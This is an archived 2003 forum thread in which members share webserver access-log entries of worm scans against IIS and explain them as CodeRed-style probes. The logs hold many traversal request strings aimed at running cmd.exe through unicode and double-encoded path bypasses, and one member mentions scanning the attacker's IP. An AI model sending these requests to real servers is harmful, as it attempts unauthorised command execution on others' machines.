General Discussion | uber-l33t h4x0r

Author	Message	Time
UserLoser	Found this in my log from my webserver running on my computer, I found it funny ;D 12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266 12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266 12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 12.211.62.105 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 12.211.62.105 - - [08/Sep/2003:02:02:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268	September 9, 2003, 12:35 AM
Yoni	Looks like a script kiddie scanning for well known IIS holes. I wonder what all those holes are.	September 9, 2003, 12:46 AM
Grok	vL.com gets those daily, and many more. I've seen most of those for 3+ years. The ..%255c../ looks like it is trying to exploit both parent paths and unicode bypass exploit at the same time. The MSADC is an exploitable sample site that is installed with II4 and IIS5, which allow increased permissions to the attacker. The rest of it is a lot of pecking around for figuring out your architecture.	September 9, 2003, 1:07 AM
UserLoser	Hmm, I'm only Windows XP Home Edition, and that's an Abyss Web Server. I don't think by doing that they can confuse the server or get past it or whatever - But, I don't know anything about website/server cracking	September 9, 2003, 1:43 AM
iago	I scanned his ip with thing's scanner, found nothing sadly :(	September 9, 2003, 1:50 AM
UserLoser	My IP or his? ;)	September 9, 2003, 1:55 AM
iago	I only see one ip.. assumed it was his :P	September 9, 2003, 1:59 AM
UserLoser	Oh it is his, but I thought since you're a moderator, you could have gotten my IP :P	September 9, 2003, 1:59 AM
Thing	Those 14 entries are the signature of a machine infected with CodeRed. It is trying to infect yours. $torm made a fine script on one of my boxes which searches the Apache access log and copies CodeRed entries to a text file. Here is a small portion of that file: [code]63.225.238.53 - - [08/Sep/2002:00:47:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712 63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712 63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779 [/code]	September 9, 2003, 12:48 PM
UserLoser	Nobody infects my computer!	September 9, 2003, 8:30 PM
Fr0z3N	[code]134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -[/code] Only one I saw. But I'm to lazy to look through them all. On Apache, Thing wanna send me that file by $torm? :D	September 11, 2003, 1:38 AM
Thing	[quote]On Apache, Thing wanna send me that file by $torm?[/quote]You should ask him. He wrote it.	September 11, 2003, 2:19 AM
Fr0z3N	where would I see him to ask?	September 11, 2003, 11:43 AM
Thing	PM this guy.	September 11, 2003, 12:51 PM

Author

Message

Time

UserLoser

Found this in my log from my webserver running on my computer, I found it funny ;D

12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:02:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268

September 9, 2003, 12:35 AM

Yoni

Looks like a script kiddie scanning for well known IIS holes. I wonder what all those holes are.

September 9, 2003, 12:46 AM

Grok

vL.com gets those daily, and many more.

I've seen most of those for 3+ years.

The ..%255c../ looks like it is trying to exploit both parent paths and unicode bypass exploit at the same time.

The MSADC is an exploitable sample site that is installed with II4 and IIS5, which allow increased permissions to the attacker.

The rest of it is a lot of pecking around for figuring out your architecture.

September 9, 2003, 1:07 AM

UserLoser

Hmm, I'm only Windows XP Home Edition, and that's an Abyss Web Server. I don't think by doing that they can confuse the server or get past it or whatever - But, I don't know anything about website/server cracking

September 9, 2003, 1:43 AM

iago

I scanned his ip with thing's scanner, found nothing sadly :(

September 9, 2003, 1:50 AM

UserLoser

My IP or his? ;)

September 9, 2003, 1:55 AM

iago

I only see one ip.. assumed it was his :P

September 9, 2003, 1:59 AM

UserLoser

Oh it is his, but I thought since you're a moderator, you could have gotten my IP :P

September 9, 2003, 1:59 AM

Thing

Those 14 entries are the signature of a machine infected with CodeRed. It is trying to infect yours.

$torm made a fine script on one of my boxes which searches the Apache access log and copies CodeRed entries to a text file. Here is a small portion of that file:
[code]63.225.238.53 - - [08/Sep/2002:00:47:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
[/code]

September 9, 2003, 12:48 PM

UserLoser

Nobody infects my computer!

September 9, 2003, 8:30 PM

Fr0z3N

[code]134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -[/code]

Only one I saw. But I'm to lazy to look through them all.

On Apache, Thing wanna send me that file by $torm? :D

September 11, 2003, 1:38 AM

Thing

[quote]On Apache, Thing wanna send me that file by $torm?[/quote]You should ask him. He wrote it.

September 11, 2003, 2:19 AM

Fr0z3N

where would I see him to ask?

September 11, 2003, 11:43 AM

Thing

PM this guy.

September 11, 2003, 12:51 PM

Valhalla Legends Forums Archive | General Discussion | uber-l33t h4x0r